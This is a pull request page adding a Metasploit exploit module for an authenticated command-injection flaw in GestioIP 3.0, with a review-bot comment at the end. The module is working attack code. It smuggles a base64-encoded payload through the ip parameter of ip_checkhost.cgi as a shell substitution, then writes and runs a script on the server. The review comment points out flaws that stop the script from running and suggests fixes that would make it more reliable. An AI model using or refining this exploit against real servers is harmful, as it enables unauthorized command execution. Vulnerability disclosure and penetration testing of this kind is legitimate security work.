GestioIP v3 Authenticated Remote Command Execution #2461

Merged
merged 3 commits into from Oct 4, 2013
85 changes: 85 additions & 0 deletions modules/exploits/multi/http/gestioip_exec.rb
@@ -0,0 +1,85 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'GestioIP Remote Command Execution',
'Description' => %q{
This module exploits a command injection flaw to create a shell script
on the filesystem and execute it. If GestioIP is configured to use no authentication,
no password is required to exploit the vulnerability. Otherwise, an authenticated
user is required to exploit.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' #Initial Discovery and metasploit module
],
'References' =>
[
[ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]
],
'Payload' =>
{
'Space' => 475, # not a lot of room
'DisableNops' => true,
'BadChars' => "#",
},
'Platform' => [ 'unix', 'win', 'linux' ],
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic GestioIP 3.0', { }]],
'Privileged' => false,
'DisclosureDate' => 'Oct 4 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('URI', [true, 'URI', '/gestioip/']),
OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
OptString.new('PASSWORD', [false, 'The password to auth with', nil])
], self.class)
end

def uri
datastore['URI']
end

def user
datastore['USERNAME']
end

def pass
datastore['PASSWORD']
end

def use_auth
!(pass.nil? or pass.empty?)
end

def exploit
headers = {}
if use_auth
headers['Authorization'] = "Basic " + Rex::Text.encode_base64("#{user}:#{pass}")
end

pay = Rex::Text.encode_base64(payload.encoded)
file = Rex::Text.rand_text_alpha(8);
send_request_cgi({
'uri' => uri+"ip_checkhost.cgi?ip=2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004&hostname=fsd&client_id=1&ip_version=",
'headers' => headers
})
end
end
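Review bot: the request built at `'uri' => uri+"ip_checkhost.cgi?ip=2607:f0d0:$(echo${IFS}" + pay + ...` concatenates the entire query string into 'uri', so none of it is URL-encoded; unless ip_checkhost.cgi reads the raw QUERY_STRING itself, a standard CGI parameter parser splits the ip value at the `&&` before `sh${IFS}`, which leaves an unterminated `$(` and means the dropped script is written but never executed. Passing ip, hostname, client_id and ip_version through 'vars_get' (which encodes them, so the `&&` reaches the server as `%26%26`) avoids that ambiguity, and lets the path be built with `normalize_uri` from a TARGETURI option, the framework convention rather than the bare 'URI' option registered here. Two smaller points in the same hunk: 'Platform' lists 'win', but the injected command relies on `${IFS}`, `base64 --decode`, `tee` and `sh`, so only the unix/linux entries can succeed; and the script that `tee` writes into the CGI's working directory is never removed, which including `Msf::Exploit::FileDropper` and calling `register_file_for_cleanup(file)` before the request would handle.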